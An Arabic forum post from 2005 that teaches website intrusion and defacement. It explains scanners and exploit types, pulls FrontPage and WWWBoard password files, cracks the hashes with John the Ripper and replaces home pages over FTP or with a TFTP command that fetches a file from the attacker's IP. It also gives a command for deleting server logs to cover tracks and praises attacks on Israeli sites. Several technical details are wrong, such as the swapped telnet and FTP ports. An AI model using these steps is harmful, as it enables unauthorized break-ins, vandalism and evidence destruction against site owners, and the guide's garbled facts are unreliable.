| | | | |
 |  |  |  |
| |||||||
 |  |  |  |
لكل مل له علاقة في اختراق المواقعلكل مل له علاقة في اختراق المواقع هكر اختراق المواقع ; بسم الله الرحمن الرحيم نبداء الدرس باذن الله 1- (اساسيات وتعاريف) تلنت: (Telnet) - 1 و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات. لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت. ---------------------------------------------------------------------- برامج السكان: (Scanner) ... |
| هكر اختراق المواقع طرق اساليب الهكر في اختراق تدمير المواقع ... |
 |
 |
 |  |  |
 |  | |
 |
 |
|
معذرتا تحتاج لتركيب مشغل الفلاش .
لكي يعمل معك الموقع اضغط هنا لتركيب مشغل الفلاش .
 المواضيع الساخنة : | ||
| شرح كامل لجميع خصائص ومميزات المنتدى للمبتدئين او المتقدمين ... | تنبيهـ / تم منع ظهور الصور الرمزيه بالقسم الاسلامي !!!! | |
| اعاده فتح منتدي عيدكم مبارك .. ؟؟ | ||
 |
| | أدوات الموضوع | أنماط العرض |
| | | | |
07-11-2005, 12:54 AM
| رقم المشاركة : 1 (permalink) |
 |  لكل مل له علاقة في اختراق المواقع بسم الله الرحمن الرحيم نبداء الدرس باذن الله 1- (اساسيات وتعاريف) تلنت: (Telnet) - 1 و هو برنامج صغير موجود في الويندوز . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات. لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت. ---------------------------------------------------------------------- برامج السكان: (Scanner) - 2 و هي برامج موجودة للمسح على المواقع و كشف ثغراتها إن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة تحتوي على الثغرات أو الاكسبلويت التي يتم تطبيقها على الموقع لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة Shadow Security Scanner و Stealth و Omran Fast هذه البرامج، برنامج Scanner و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر معين مثل البرامج المختصة بالسكان على سيرفرات الـ IIS على ثغرات السي جي اي فقط و منها برامج المسح CGI ----------------------------------------------------------------------- اكسبلويت: (Exploits) - 3 هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان URL ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين في السيرفر لعمل كراش له ، و هذا ما يسمى بـ Buffer Over Flow Exploits هناك أنواع من الإكسبلويت ، فمنها ال CGI Exploits CGI Bugs Unicodes Exploits Buffer Over Flow Exploits PHP Exploits DOS Exploits والتي تقوم بعملية حجب الخدمة للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر أي فايرول Fire Wall .وهناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون امتدادها (.c) هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل الإكسبلويت المكتوب بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه Borland C++ Compiler و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا. ---------------------------------------------------------------------- الجدار الناري: (FireWall) - 4 هي برامج تستعملها السيرفرات لحمايتها من الولوج الغير شرعي لنظام ملفاتها من قبل المتطفلين هي تمثل الحماية للسيرفر طبعا ولكني أنوه بأن الفايروات المستخدمة لحماية السيرفرات (المواقع) تختلف عن تلك التي تستخدم لحماية الأجهزة. ---------------------------------------------------------------------- هو ملف الباسورد المظلل: (Token) - 5 (Shadowed Passwd) والذي يكون فيه الباسورد على شكل * او x البحث عن ملف الباسورد الغير المظلل و الذي يسمى إن وجدت ملف الباسورد مظللا ، فيجب Shadow file تجده في /etc/shadow ---------------------------------------------------------------------- Anonymouse) - 6 هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها في الدخول المجهول الى السيرفر و سحب الملفات منه. ---------------------------------------------------------------------- Valnerableties) - 7 أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره . ما هي مفردها ؟ Valnerable أي ثغرة أو بالأصح موضع الضعف والمكان الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع Security Focus أو بوق تراك او غيرها. ---------------------------------------------------------------------- : ملف الباسوورد(passwd file) - 8 هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا. ---------------------------------------------------------------------- الجذر: (root) - 9 و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات. غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها . ---------------------------------------------------------------------- السيرفر: (Server) - 10 هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع الإسرائيلية و بكثرة و لله الحمد .( جزاكم الله خيرا أيها المجاهدون) ----------------------------------------------------------------------- بوفر أوفر فلو: ( Buffer over Flow ) - 11 وهي نوع من أنواع الاكسبلويتات التي تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها . و هي شبيهة نوعا ما بعملية حجب الخدمة اذ أنها تقوم بعملية اوفر لود على جزء مركز من السيرفر . ----------------------------------------------------------------------- كثير من الهكرز يحبون ان يطلقوا على كل من ال - 12 pc , servers , supercomputers كلمه BOX ----------------------------------------------------------------------- 13- النظام الذي سوف نقوم باختراقه يحتوي عاده على العديد من اليوزرز ..بالاضافه لليوزرز تسطيع ان تطلق على الرئيس هناك كلمه superuser وهو يكون روت وهو الادمين او المدير على النظام.... ----------------------------------------------------------------------- 14- ماهو الشيل اكاونت: هو عباره عن خدمه حيث يمكنك من خلالها التحكم في جهاز من بعيد و هذا الجهاز عليه نظام اليونيكس. ----------------------------------------------------------------------- 15- احنا اخترقنا موقع لازم نمسح خطواتنا علشان لايعرفنا صاحب الموقع ويئذينا كيف؟ /c+del+c:/winnt/system32/logfiles/*.log نكتب هذا الامر بالدوس او نروح السي وبعدين فايل ويندوز بعدين فايل system32 بعدين امسح ملف اسمة * وامتدادة log(شكر للاخ هتر جده) ---------------------------------------------------------------------- 16- الحين احنا اخترقنا موقع ونبي نغير صفحة البداية ونكتب تم اختراق هذا الموقع كيف؟ تقدر تغير الصفحه الرئيسه لما يكون الباسورد حق الموقع عندك بعدين تدخل عليه بعدين تروح لملف اسموا index افتحوا او الغيه و حط ملف بنفس الاسم بالأشياء الي تبيها ببرنامج اسمه cute FtP WS_FTP PRO والبرنامج سهل اللي يبي شرح يقولي ------------------------------------------------------------------------------------------------ 17- ( برامج للبحث عن ثغرات وأنظمة المواقع وبعض معلوماتها ) هذي من أفضل برامج البحث عن الثغرات وانشاء الله تعجبكم انت بس ادخل وتلقى: ============================================ ************************************************** ************* 2- Shadow Security تحميل البرنامج[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] تحميل الكراك[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] تحميل ملف التعريب[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] وصلة شرح البرنامج[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات ************************************************** ************* 3- Omran Scanner [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] شرح البرنامج[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] برنامج عربي من برمجة الأخ/عمران الغامدي ولابأس به لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل Linux-Unix-NT ************************************************** ************* 4- CGI Scanner وصلة تحميل البرنامج[فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] مختص في البحث عن ثغرات cgi وهو الأفضل في عمل ذلك ************************************************** ************* 5- UniScan [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] كالسابق ولكن هذا البرنامج خاص بفحص ثغرات UNicode ************************************************** ************* ************************************************** ************* 8- voideye [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على sss ************************************************** ************* الملقمات اشهرها اثنين: - 18 IIS: من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها). apache: من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب. ----------------------------------------------------------------- 19- اول خطوة في الاختراق هي اخذ المعلومات: يعني نعرف الموقع شنو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها. طيب الحين عندنا موقع وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها عندك الموقع [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ملاحظة: نكتب الموقع من غير http:// ولا / اللي بالاخير او نستخدم التلنت. 1 - مثال على ملقمات اي اي اس: راح يطلع لنا التالي The site [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] is running Microsoft-IIS/5.0 on Windows 2000 طيب الحين عرفنا معلومتين مهمتين اول شيء انه شغال على الملقم IIS5.0 ثاني شيء شغال على نظام ويندوز 2000 اول شيء نجرب ثغرات IIS5.0 عليه إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000 طيب الحين فيه حاجة اسمها يوني كود هذه تخترق فيها عن طريق المتصفح وماتمشي إلا مع ملقمات IIS وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. طيب لنفرض انه ماطلع فيها ثغرات؟ نشوف محتويات الموقع نفسه نشوف إن كان عنده سجل زوار او منتدى او .... 2 - مثال على ملقمات اباتشي: ناخذ مثال موقع ارانك [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] لو حللناه بالنيت كرافت راح نشوف النتيجة التالية: The site [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux هنا يهمنا ثلاث اشياء:- 1- الملقم وهو: apache 1.3.20 2- ودعم فرونت بيج وهذه مليانة ثغرات FrontPage/5.0.2.2510 3- النظام وهو Linux -=-=-=-=-=-=-=-=-=-=-=-=-=-=- الملقم: اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب. -=-=-=-=-=-=-=-=-=-=-=-=-=-=- دعم الفرونت بيج زي ماقلنا الفرونت بيج مليان ثغرات وثغراته قوية وكثيرة تقريبا منها مجلد _vti_pvt و _private هذه اللي نحتاجها غيره مامنه فايدة داخل المجلدين راح نلاقي اربع ملفات مهمة وهي service.pwd و users.pwd و authors.pwd و adminstators.pwd ويعتبر هذا اخطر ملف طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال goodyco:CalXS8USl4TGM وهذا من موقع قودي [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] طيب الحين goodyco اليوزر والباسورد مشفر واللي هو CalXS8USl4TGM وشلون ينفك؟ ينفك ببرنامج اسمه john the repaier ( شرح الاستخدام موجود في اخر موضوع في هذا المجلد) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- طيب نروح للفقرة الثالثة واللي هي النظام زي ماشفنا النظام هو لينكس لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر لكن هنا راح تواجهك مشكلتين اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ال telnet واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته المشكلة الثانية لازم يكون عندك لينكس اصلا علشان ثغراته بلغة ال c وهذه ماتشتغل إلا عاللينكس فقط. ---------------------------------------------------------------------- 20- (مواقع تطلعلك ثغرات الانظمة والويندوز والمنتديات وووو....) [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] الموقع هذا خطير جداً جداً تروح ل EXPLOITS اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من c و perl و يوني كود. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] هذا الموقع مفيد جدا تكتب مثلا فوق بالمربع اللي عاليمين IIS او apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- أرشيف لثغرات [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] أرشيف لثغرات [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ارشيف لثغرات [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ارشيف لثغرات [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] مواقع لثغرات [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] --------------------------------------------------------------------- 20- هناك انظمة وملقمات كثيرة منها: Apache (الملقم) IIS(الملقم) SunOS(الملقم) FreeBSD (My BaBe)(الملقم) OpenBSD(الملقم) NetBSD(الملقم) AIX(الملقم) IRIX(الملقم) NetScape(الملقم) Enterprise(الملقم) Windows/NT/2000/xp (نظام التشغيل) Linux(نظام الشتغيل ) ------------------------------------------------------------------- له ست مجلدات) 21- (اليونكس bin خاص بالملفات الثنائيه يعني اللي تشغل النظام etc ملفات ادارة النظام ومن ظمنها الرووت اللي هو حساب مدير النظام او passwd dev ملفات الاجهزه lib مكتبات الربط الديناميكي اللي تساعد النظام في التشغيل tmp الملفات الموقته او غير الثابته usr اسماء المستخدمين وكلمات السر اللي لهم حسابت بالنظام -------------------------------------------------------------------- 22- (اوامر الاف تي بي) Pwd لكي تعرف ما يحتويه الهارد ديسك Cd لإقتحام مجلد مثال Cd black في هدا المثال قمت بإقتحام مجلد المسمى بلاك Ls لكي يتضح لك محتوى المجلد أو الهارد ديسك Get لكي تحمل الى سطح المكتب حق جهازك مثال Get black.exe Put العملية العكسية ل Get يعني ان تأخد ملف من سطح المكتب حق جهازك و تضعه في في جهاز الضحية مثال Put black.exe Clos لقطع الإتصال مع الضحية يمكنك تشغيل الاف تي بي من الويندوز عن طريق : START > RUN > ftp -n hostname ---------------------------------------------------------------------------- 23- بورتات برامج:- 7 echo 21 telnet 23 ftp 25 smtp 80 http 110 POP ---------------------------------------------------------------------------- c - 24 هو برنامج سي لكنه سورس كود فقط واغلب الثغرات التي يتم كتابتها بالسي ولاكن المشكلة انه لايمكن تشغيله تحت بيئة ويندوزفيجب ان يكون عندك Linux او Shell Account ---------------------------------------------------------------------------- 25 - ملاحظة رسائل لأخطاء ومن أشهرها الرسالة 404 Error وهي تظهر عند طلب ملف غير موجود بالموقع وعند ظهور هذه الصفحة انظر إلى أسفل الصفحة وقد تجد معلومات مثل إصدارة ملقم الويب وهذه معلومات غير مضرة أو خطير لكنها تفيد في عملية الاختراق. --------------------------------------------------------------------------- 26-(كيف تحصل على شيل اكاونت مجانا) و تنقسم الشيل اكونتس الي نوعين: 1-restricted 2-non-restricted و الفرق بينهما ان restricted مدفوع القيمه و يمكنك من تنفيذ اي command اما ال non restricted فهو مجاني و لكن مشكلته انه لا يمكنك من تنفييذ كل الاوامر! لكي تحصل علي شيل اكونت مجانا يمكنك الحصول عليه من اي مزود شيل اكونتس علي الشبكه مثل [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] او الاتصال بمزود الخدمه و اطلب منه شيل اكونت طبعا سيسالك لماذا تريد الشيل اكونت اجب عليه بانك تريد استخدام و التدرب علي نظام اللينكس و اليونكس فيما بعد و هذي الاجابه كافيه لك يعطيك شيل اكونت و الشيل اكونتس مختلفه و تتميز فيما بينها بالتالي: 1-telnet 2-nslookup و الذي يعطيك معلومات عن المضيف 3-ftp 4-finger 4-trace route 5-dig و هذا الامر غير متاح غالبا في معظم الشيلز المجانيه 6-netstat 7-gcc و هذا كمبيلير للغه البرمجه c 8-gzip لفك ضغط الملفات 9-lynx متصفح للانترنت ------------------------------------------------------------------ تغيير الصفحة الرئيسية للموقع وعملية الاب لوود بواسطة برنامج - 27 .TFTP -=-=-=-=-=-=-=-=-=-=-=-=- قم بانشاء صفحة وضع شعارك عليها واحفظها باسم index.htm على الـ c:\ قم بتشغيل برنامج TFTP :ونفذ الامر في الفقرة التالية /c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.ht m tftp.exe وهو البرنامج اللازم لعمل الاب لوود ويجب ان يكون شغال في حالة تنفيذ الامر "-i" وهو بمثابة باراميترز لزوم قراء البيانات في مكتبة الملفات 1.1.1.1 رقم الايبي الخاص بك GET وهو الامر اللازم لطلب الملفات مابين الارسال والاستقبال index.htm اسم الملف بجهازك \inetpub\wwwroot\ اسم الدليل في السيرفر index.htm اسم الملف على السيرفر ----------------------------------------------------------------- تحاول أن تدخل لوحة التحكم معظم المواقع تكون لوحة تحكمها على الشكل - 2 [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] او [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] هذا في حال كان الموقع يستخدم الـ CPanel وهو البرنامج الأكثر شيوعاً .. ومن ثم تظهر لك نافذة اكتب فيها اسم المستخدمة وكلمة السر .. وتصير في الداخل. ---------------------------------------------------------------- 29- اماكن تواجد ملف باسوورد المواقع: Sunos 5.0 etc/shadow او etc/passwd Linux etc/shadow او etc/passwd BSD4.3 –RENO etc/master.passwd AIX etc/security/passwd NT ويندوز scripts/passwd ---------------------------------------------------------------- 30- كيف اتاكد انا الثغر شغالة ولا لا؟ - جرب اللثغرة بواسطة الـ URL او الـ URI . ---------------------------------------------------------------- 31- كيف تسد ثغرات اي اي اس اذا كانت شغالة في موقعك؟ (IIS4.0 on WinNT) [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] (IIS5.0 on Win2000) [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ---------------------------------------------------------------- 32 - ما الفرق بين ملف الباسورد المشفر encryption والمضلل shadowed? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- الملف المضلل shadow file يكون مكان كلمة المرور رمز مثل * أو x أو # أو ! وهذا مثال لها root0Super-User:/:/sbin/sh لكن الملف المشفر تكون كلمة المرور مكتوبه ولكن مشفره مثل هذه root:Q71KBZlvYSnVw:0Super-User:/:/sbin/sh هنا تكون كلمة المرور المشفره هي: Q71KBZlvYSnVw ------------------------------------------------------------------- وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟ - 33 -=-=-=-=-=-=-=-=-=-=-=-=-=-=- يتم كسر كلمة السر المشفرة ببرنامج جون ذا ريبر الذي ساضع طريقة عملة بالتفصيل في اخر الدرس وهذا البرنامج يقوم بتجربة 5000 كلمة بالثانية(سرعة جنونية) مما يجعله الاسرع في فك التشفير. ------------------------------------------------------------------- 34 -اذا كان ملف passwd مضلل ماذا تفعل؟ الان جميع ملفات passwd تكون مضللة ولكن توجد طريقة لفكها اذا وجدت الملف مضلل يجب عليك البحث عن ملف الشادو shadow ماهي اماكن تواجد ملف shadow في الأنظمة؟ وهذا الملف يوجد في امكنه معينه وكل نظام تشغيل له مكان يوضع به هذا الملف ، اليك الجدول التالي: Linux : /etc/shadow token = * SunOS : /etc/shadow token = يأخذ أشكال متعدده اشهرها هو * FreeBSD : /etc/master.passwd or /etc/shadow token = * والجديد هو x IRIX : /etc/shadow token = x AIX : /etc/security/passwd token = ! ConvexOS : /etc/shadow or /etc/shadpw token = * -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- token تعني الرمز الذي يوجد في الملف passwd وهذا يفيد في تسهيل المهمه ، يعني لو مثلا لقيت علامه ! بدل كلمه المرور فهذا يعني ان كلمة المرور مسجله في /etc/security/passwd ، لقد إستعنت بالجدول السابق ذكره ، مثال على ملف شادو ( ملف شادو هو الملف الذي تخزن فيه كلمة المرور الصحيحه). ملف الشادوا تكون الكلام الذي فيه مشفر الخظوة الأخيرة وهي دمج ملف shadow & passwd انصحك في دمج ملف الشادو مع ملف الباس بكتابة هذا الامر في برنامج جون ذا رباير وصلة البرنامج ********************************************** [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ********************************************** انبه اولا من ان البرنامج مخصص لفك تشفير الملفات المشفرة ولكن يوجد في امر لدمج ملف الشادو مع ملف الباس وذلك لضمان عدم وقوع اخطاء عند الدمج الامر هو unshadow passwd.txt shadow.txt اذا لم تنجح العملية وتريد تطبيقها يدويا فهي سهلة ولكن لضمان عدم وقوع اخطاء عند الدمج فقط قم بتبديل علامة x التي تكون في ملف الباس ب اللام الموجود بدلا عنها في ملف الشادو تطبق العملية في كل علامة x تكون في ملف الباس ------------------------------------------------------------------- 35- فك تشفير ملف shadow asswd بعد دمجه مع ملف x وهو طريقة فك تشفير ملف passwd الدليل الكامل لكسر كلمات السر برنامج John the Ripper لكسر كلمات السر ----------------------------------------------------------------- برنامج - 36 (John the Ripper) احد افضل البرامج لكسر كلمات السر التي يحصل عليها المخترقون من الانظمة (nix*) وهذه الانظمة واخص الاصدارات الحديثة توفر نظام حماية إضافي لملف (PASSWD) بان يكون مضلل وعلى المخترق الحصول على ملف (SHADOW) لكي يحصل على ملف كلمات السر مشفرة ومن ثم يقوم بكسر هذا التشفير . هذه هي الوظيفة الاساسية واعتبرها من اهم الخطوات في اختراق الخوادم لانها تعطيك المفتاح . ---------------------------------------------------------------- 37 - كيف استغلال الباسورد: يمكنك استغلال باسورد الموقع في التلنت تدخل من التلنت وتفعل ماتريد او انك تدخل من الاف تي بي وهو الأسهل والمنتشر كيفية الدخول ب ftp يمكنك استخدام احد برامج ال ftp منها ws_ftp او CuteFTP 4.2.5 Build 10.4.1 وعنوانه [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] --------------------------------------------------------------------- 38 - طريقة تنفيذ الثغرات: مكان تنفيذ الثغرات [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] أي بعد دوت كوم بعض الناس يسألون مالذي يظهر او على اي شكل يظهر الحل بسيط هذا الامر لو قمت بكتابته في نافذة الدوس ستظهر لك الملفات Dir وطريقة ظهور الملفات في المتصفح تقريبا بنفس طريقة الدوس -------------------------------------------------------------------- 2-(شرح الثغرات واستغلالها) 1 - شرح ثغرة الفرونت بيج وكيفية استغلالها: ثغرة الفرونت بيج هي ثغرة منتشرة جدا بين المواقع وتأتي عادة بهذا الشكل [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] يعني الثغرة هي _vti_pvt ومن خلال هذه الثغرة تظهر لك ملفات الموقع (الفرونت بيج) او المشرف ملاحظة:- تنفذ الثغرة وتوجد على المواقع التي صممت بالفرونت بيج ولا تصلح لغيرها لتعرق اذا الموقع مصمم بالفرونت بيج من موقع [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] تدخل الموقع تشوف قدامك مستطيل أدخل الموقع اللي تبي تجمع معلومات حوله ويهمنا ملف واحد ومن غيره لانستفيد شيئا وهو service.pwd نفتحه بالمفكرة وتشوف الباسوورد لكن هاي الباسوورد مشفرة وتكون بهذا الشكل -FrontPage- ekendall:bYld1Sr73NLKo louisa:5zm94d7cdDFiQ هنا نرى ان الموقع عليه مشرفين ekendall و louisa نفك التشفير بواسطة برنامج جون ذا ريبر طبعا وبعد فك التشفير بالجون ذا ريبر تروح للفرونت بيج file open web وتحط الموقع فتطلعلك الصفحة الرئيسية فغير اللي بدك اياه بعدين save or publish بعدين بيطلب منك كلمة السر والاسم طبعا الشغلة سهلة تحط الاسم وكلمة السر وتحط sign وهذا موقع للتطبيق [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] ------------------------------------------------------------------- 2 - شرح ثغرة ملف الباسوورد وكيفية استغلالها: ثغرة الـ WWWBoard هي أسهل ثغرة بالإضافة إلى الفرونت بيج. لنفترض أن الموقع المراد إختراقه هو [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] لنضف إليه wwwboard/passwd.txt فيصبح العنوان [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] نفتح العنوان سوف تجد cknouse:aexMVWnDOyrdE كلمة المرور+ إسم المستخدم يعني إسم المستخدم هو cknouse وكلمة المرور هي aexMVWnDOyrdE فك تشفيره بجون ذي ريبر الحين عندك إسم المستخدم وكلمة المرور وش تسوي عشان تغير الصفحة الرئيسية روح للفتب وإكتب ftp.domen.com ملاحظة إستبدل domen.com بإسم الموقع إلي عندك باسوورده وحط اليوزر نيم والباسوورد وإدخل على الموقع أنشئ صفحة بإسم index.html وإرفعها للموقع لتحميل الفتب [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] -------------------------------------------------------------------- 3 - شرح ثغرة سي جي اي وكيفية استغلالها: CGI bugs وبعضها يمكن استخدامها مباشرة من المتصفح مثل اليونيكود وبعض ثغرات السي جي آي ولكن بعض أو أكثر ثغرات المتصفح يتم التأكد فقط من وجودها من خلال المتصفح. الثغرات التي يمكن استغلالها من المتصفح مباشرة مثل /cgi-bin/passwd.txt إذا كان الموقع هو [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] فتكتب الثغرة هكذا في المتصفح [فقط الأعضاء المسجلين يمكنهم مشاهدة الروابط. إضغط هنا للتسجيل...] هذه الثغرة تعرض لك أسماء المستخدمين وكلمات المرور للمستخدمين للموقع مثل المدير وكل من يسمح له بدخول قاعدة بيانات الموقع طبعا لا تحاول تجربة هذه الثغرة الآن ...إلا إذا كنت تريد اختراق موقع في زيمبابوي نسيه أصحابه من 10 سنين حتى هذه الثغرة يمكن الا تصلح معهم لانها صارت معروفة. 